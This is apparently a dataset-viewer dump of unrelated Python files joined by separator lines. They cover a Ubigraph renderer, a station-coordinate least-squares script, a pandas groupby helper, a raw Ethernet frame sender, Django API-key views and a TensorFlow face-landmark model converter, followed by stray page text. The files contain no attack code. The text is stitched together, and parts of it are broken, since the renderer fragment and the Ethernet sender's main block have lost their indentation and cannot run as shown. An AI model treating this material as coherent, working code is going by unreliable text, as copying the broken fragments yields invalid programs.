time.sleep(self._event_delay)
else:
logger.warn('edge %d cannot be removed. No mapping exists.' % eidx)
def highlight_edges_(self,edges):
for eidx in edges:
if eidx not in self._highlighted_edges:
self.server_graph.change_edge_style(self.edge_map[eidx], self.highlighted_edge_style)
self._highlighted_edges.add(eidx)
return
def highlight_nodes_(self,nodes):
for nidx in nodes:
if nidx not in self._highlighted_nodes:
self.server_graph.change_vertex_style(self.node_map[nidx], self.highlighted_node_style)
self._highlighted_nodes.add(nidx)
return
def highlight_edges(self,edges):
self.highlight_edges_(map(lambda x: self._graph.edge_idx(*x),edges))
def highlight_nodes(self,nodes):
self.highlight_nodes_(map(lambda x: self._graph.node_idx(x),nodes))
if __name__ == '__main__':
    import zen
    import time

    logging.basicConfig(level=logging.DEBUG)

    # Demo: stream a small directed graph to a locally running Ubigraph server.
    G = zen.DiGraph()
    ur = UbigraphRenderer('http://localhost:20738/RPC2')
    ur.default_node_shape = 'sphere'
    ur.default_node_color = '#1100dd'
    ur.graph = G

    # Grow the graph one edge per second so the layout can be watched live.
    for u, v in [(1, 2), (2, 3), (3, 4)]:
        G.add_edge(u, v)
        time.sleep(1)
    G.add_edge(1, 4)

    ur.highlight_edges([(1, 2), (2, 3)])
    ur.highlight_nodes([1])
|
#%%
# Ad-hoc analysis script: compare two station-coordinate solutions and
# estimate translation parameters between them by least squares.
# NOTE(review): relies on star imports from HelmertTool (load_sta,
# ordinary_least_squares, weighted_least_squares) and on hard-coded absolute
# Windows paths — runnable only on the author's machine.
from HelmertTool.transform import *
from HelmertTool.regression import *
from HelmertTool.load import *
import numpy as np
#%%
# Reference solution (b) and perturbed solution (a).  Presumably .sta files
# carry X/Y/Z coordinates plus X_sigma/Y_sigma/Z_sigma — confirm load_sta.
b = load_sta("C:/Users/Adrian/Documents/NVI/HelmertTool/data/2020d.sta")
a = load_sta("C:/Users/Adrian/Documents/NVI/HelmertTool/data/2020d_off_0_0_10p_rate_0_0_0.sta")
n = len(a.index)
# Coordinate differences scaled by 1000 (presumably meters -> millimeters),
# and the summed variances of both solutions on the same scale.
residuals = (a[["X", "Y", "Z"]] - b[["X", "Y", "Z"]])*1000
variances = (a[["X_sigma", "Y_sigma", "Z_sigma"]]*1000)**2 + (b[["X_sigma", "Y_sigma", "Z_sigma"]]*1000)**2
#%% Calculate translation parameters, separate calculations
# One independent single-parameter (pure translation) fit per coordinate axis:
# design matrix is a column of ones, observations are the axis residuals.
for dim in ["X", "Y", "Z"]:
    X = np.ones((n,1))
    y = np.array(residuals[dim]).reshape(n,1)
    y_var = np.diag(variances[dim + "_sigma"])
    o_par = ordinary_least_squares(X, y)
    w_par, w_par_unsc = weighted_least_squares(X, y, y_var)
    print(f"{dim} : {o_par}/{w_par}/{w_par_unsc['C0']} (par/weight par/unsc)")
#%%Calculate translation parameters, one calculation
# The same three translations estimated jointly: stack the three axis systems
# into one 3-parameter fit with a block design matrix.
X_list = []
y_list = []
y_var_list = []
for i, dim in enumerate(["X", "Y", "Z"]):
    # Block i of the design matrix: a ones column in position i (this axis's
    # translation parameter), zeros elsewhere.
    X_temp = np.zeros((n,3))
    X_temp[:,i:i+1] = np.ones((n,1))
    X_list.append(X_temp)
    y_list.append(np.array(residuals[dim]).reshape(n,1))
    y_var_list.append(np.array(variances[dim + "_sigma"]).reshape(n))
X = np.vstack(X_list)
y = np.vstack(y_list)
y_var = np.diag(np.hstack(y_var_list))
o_par = ordinary_least_squares(X, y)
w_par, w_par_unsc = weighted_least_squares(X, y, y_var)
print(o_par, w_par, w_par_unsc)
"""
Unweighted Transform: 55,30 13,95 6,65
Weighted Transform 51,54230329 63,59747675 58,64105015
Sigma 0,272189593 0,169984491 0,17453374
Chi-square(No translation) 99130 280280 147091
Chi-square(After) 63272 140302 34204
Note that chi-square is reduced.
"""
from ..utils.groupby_func import groupby_func
def df_to_groupby(data, by, func):
    '''Group a dataframe by one column and aggregate it with ``func``.

    data : dataframe
        A pandas dataframe
    by : str
        The column by which the grouping is done
    func : str
        The function to be used for grouping by: 'median', 'mean', 'first',
        'last', 'std', 'mode', 'max', 'min', 'sum', 'random', 'freq', 'string'.
    '''
    grouped = data.groupby(by)
    return groupby_func(data=grouped, func=func)
|
from socket import *
def send_packet(src, dst, eth_type, payload, interface = "eth0"):
    """Send a raw Ethernet frame on ``interface`` and return the byte count sent.

    ``src`` and ``dst`` are 6-byte MAC addresses, ``eth_type`` is the 2-byte
    EtherType field, and ``payload`` is the frame body.  Requires a platform
    with AF_PACKET (Linux) and raw-socket privileges.
    """
    assert(len(src) == len(dst) == 6) # 48-bit ethernet addresses
    assert(len(eth_type) == 2) # 16-bit ethernet type
    s = socket(AF_PACKET, SOCK_RAW)
    try:
        # From the docs: "For raw packet
        # sockets the address is a tuple (ifname, proto [,pkttype [,hatype]])"
        s.bind((interface, 0))
        return s.send(src + dst + eth_type + payload)
    finally:
        # Always release the raw socket — the original leaked it on every call
        # and on any bind/send failure.
        s.close()
if __name__ == "__main__":
print("Sent %d-byte Ethernet packet on eth0" %
send_packet("\xFE\xED\xFA\xCE\xBE\xEF",
"\xFE\xED\xFA\xCE\xBE\xEF",
"\x7A\x05",
"hello"))
|
from django.shortcuts import render, get_object_or_404
from django.http import HttpResponseRedirect
from django.contrib.auth.decorators import login_required
from django.core.urlresolvers import reverse
#from django.contrib import messages
from apps.apies.models import Api
from apps.apies.forms import ApiForm
def clear_character_session(request):
    """Remove the cached character-selection keys from the session.

    Uses ``pop`` with a default instead of ``del`` so a partially populated
    session (callers only guard on ``'charpk'``; ``'access'`` or
    ``'moderator'`` may be absent) no longer raises ``KeyError``.
    """
    request.session.pop('charpk', None)
    request.session.pop('access', None)
    request.session.pop('moderator', None)
@login_required
def apies(request):
    """Show the user's API keys and handle submission of a new key."""
    form = ApiForm(request.POST or None, user=request.user)

    # On a valid POST, store the new key and present a fresh, empty form.
    if request.POST and form.is_valid():
        form.save(request.user)
        form = ApiForm(user=request.user)

    character_keys = Api.objects.filter(
        user=request.user,
        accounttype__in=[Api.CHARACTER, Api.ACCOUNT],
    )
    corporation_keys = Api.objects.filter(
        user=request.user,
        accounttype=Api.CORPORATION,
    )

    context = {
        "api_form": form,
        "char_apies": character_keys,
        "corp_apies": corporation_keys
    }
    return render(request, "apies/apies.html", context)
@login_required
def delete_api(request, pk):
    """Delete one of the user's API keys along with its related records."""
    key = get_object_or_404(Api, pk=pk, user=request.user)
    key.delete_related()
    key.delete()

    # Drop any cached character selection that may reference the removed key.
    if "charpk" in request.session:
        clear_character_session(request)

    return HttpResponseRedirect(reverse("apies"))
@login_required
def update_api(request, pk):
    """Refresh one of the user's API keys from the upstream service."""
    key = get_object_or_404(Api, pk=pk, user=request.user)
    key.update()

    # Drop any cached character selection so it is rebuilt from fresh data.
    if "charpk" in request.session:
        clear_character_session(request)

    return HttpResponseRedirect(reverse("apies"))
|
import tensorflow as tf
import json
import numpy
import os
import sys
# Model weights, keyed as params[dense_block][conv_layer][tensor_name];
# populated below from the per-tensor JSON dump files.
params = {}
def load(filename, shape, dtype):
    """Read a JSON array from ``filename`` and return it as a tf tensor.

    Parameters:
      filename (str): path to a file containing a JSON-encoded (nested) list.
      shape (list): target shape for the returned tensor.
      dtype: TensorFlow dtype for the tensor.
    """
    with open(filename, 'r') as f:
        # The weight dumps are .json files; parse with the json module instead
        # of the original eval(), which would execute arbitrary file contents.
        d = json.loads(f.read())
    t = tf.convert_to_tensor(d, dtype=dtype)
    t = tf.reshape(t, shape)
    return t
def loadAnNumpyArray(filename, shape, dtype):
    """Read a JSON array from ``filename`` and return it as a numpy array.

    Parameters:
      filename (str): path to a file containing a JSON-encoded (nested) list.
      shape (tuple): target shape for the returned array.
      dtype: numpy dtype (or dtype name) for the returned array.

    Returns:
      numpy.ndarray with the requested shape and dtype.
    """
    with open(filename, 'r') as f:
        # The dumps are .json files; parse with the json module instead of the
        # original eval(), which would execute arbitrary file contents.
        d = json.loads(f.read())
    t = numpy.asarray(d, dtype=dtype)
    t = numpy.reshape(t, shape)
    return t
# Input tensor: a single normalized 112x112 RGB image.
normalized = loadAnNumpyArray("normalized.json", (1,112,112,3), numpy.float32)

# Load the weights for the four dense blocks.  Except for dense0.conv0 (a
# plain convolution over the 3 input channels), every layer is a
# depthwise-separable convolution with depthwise filter [3,3,in_ch,1],
# pointwise filter [1,1,in_ch,out_ch] and bias [out_ch].  conv0 of each block
# widens the channel count; conv1..conv3 keep it constant.  This loop
# replaces ~70 copy-pasted assignments and produces the identical dict.
in_channels = 32
for block_index, out_channels in enumerate([32, 64, 128, 256]):
    block_key = "dense%d" % block_index
    params[block_key] = {}
    for conv_index in range(4):
        conv_key = "conv%d" % conv_index
        prefix = "%s.%s." % (block_key, conv_key)
        layer = params[block_key][conv_key] = {}
        if block_index == 0 and conv_index == 0:
            # dense0.conv0 is a regular convolution over the RGB input.
            layer["filters"] = load(prefix + "filters.json", [3,3,3,32], tf.float32)
            layer["bias"] = load(prefix + "bias.json", [32], tf.float32)
            continue
        cin = in_channels if conv_index == 0 else out_channels
        layer["depthwise_filter"] = load(prefix + "depthwise_filter.json", [3,3,cin,1], tf.float32)
        layer["pointwise_filter"] = load(prefix + "pointwise_filter.json", [1,1,cin,out_channels], tf.float32)
        layer["bias"] = load(prefix + "bias.json", [out_channels], tf.float32)
    in_channels = out_channels

# Fully connected head: 256 features -> 136 outputs.
params["fc"] = {}
params["fc"]["weights"] = load("weights.json", [256,136], tf.float32)
params["fc"]["bias"] = load("bias.json", [136], tf.float32)
def denseLayer(inp, dense, isFirstLayer=False):
    """Apply one dense block: four convolutions with cumulative skip sums.

    ``dense`` is one entry of ``params`` (e.g. ``params["dense0"]``).  conv0
    is strided (downsampling); when ``isFirstLayer`` is True it is a plain
    convolution, otherwise depthwise-separable.  conv2 and conv3 each consume
    the ReLU of the sum of all previous outputs, and the block returns the
    ReLU of the sum of all four layer outputs.
    """
    def sep_conv(x, layer, strides):
        # Depthwise-separable convolution followed by a bias add.
        return tf.math.add(
            tf.nn.separable_conv2d(
                x, layer["depthwise_filter"], layer["pointwise_filter"],
                strides, 'SAME'),
            layer["bias"])

    if isFirstLayer:
        out1 = tf.math.add(
            tf.nn.conv2d(inp, dense["conv0"]["filters"], [1,2,2,1], 'SAME'),
            dense["conv0"]["bias"])
    else:
        out1 = sep_conv(inp, dense["conv0"], [1,2,2,1])
    out1 = tf.nn.relu(out1)

    out2 = sep_conv(out1, dense["conv1"], [1,1,1,1])
    out3 = sep_conv(tf.nn.relu(tf.math.add(out1, out2)),
                    dense["conv2"], [1,1,1,1])
    out4 = sep_conv(tf.nn.relu(tf.math.add(out1, tf.math.add(out2, out3))),
                    dense["conv3"], [1,1,1,1])

    return tf.nn.relu(tf.math.add(out1, tf.math.add(out2, tf.math.add(out3, out4))))
# Build the TF1 inference graph: four dense blocks, average pooling, and a
# fully-connected head producing 136 values (presumably 68 (x, y) facial
# landmarks — confirm against the face-api model).
inp = tf.placeholder(tf.float32, [1,112,112,3], name='input')
out = denseLayer(inp, params["dense0"], True)
out = denseLayer(out, params["dense1"])
out = denseLayer(out, params["dense2"])
out = denseLayer(out, params["dense3"])
out = tf.nn.avg_pool(out, [1,7,7,1], [1,2,2,1], 'VALID')
# Flatten, apply the FC head, and name the result 'output' for consumers.
out = tf.math.add(
    tf.matmul(
        tf.reshape(out, [tf.shape(out)[0], -1]),
        params["fc"]["weights"]),
    params["fc"]["bias"], 'output')
# Output directory for the SavedModel: first CLI argument, or a default name.
if len(sys.argv[1:]) > 0:
    modelName = sys.argv[1]
else:
    modelName = "face-api-landmarksnet"
with tf.Session() as sess:
    # Run one forward pass on the pre-normalized sample image as a sanity check.
    print(sess.run(out, feed_dict={inp: normalized}))
    # Use TF to save the graph model instead of Keras save model to load it in Golang
    builder = tf.saved_model.builder.SavedModelBuilder(modelName)
    # Tag the model, required for Go
    builder.add_meta_graph_and_variables(sess, ["myTag"])
    builder.save()
    sess.close()
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.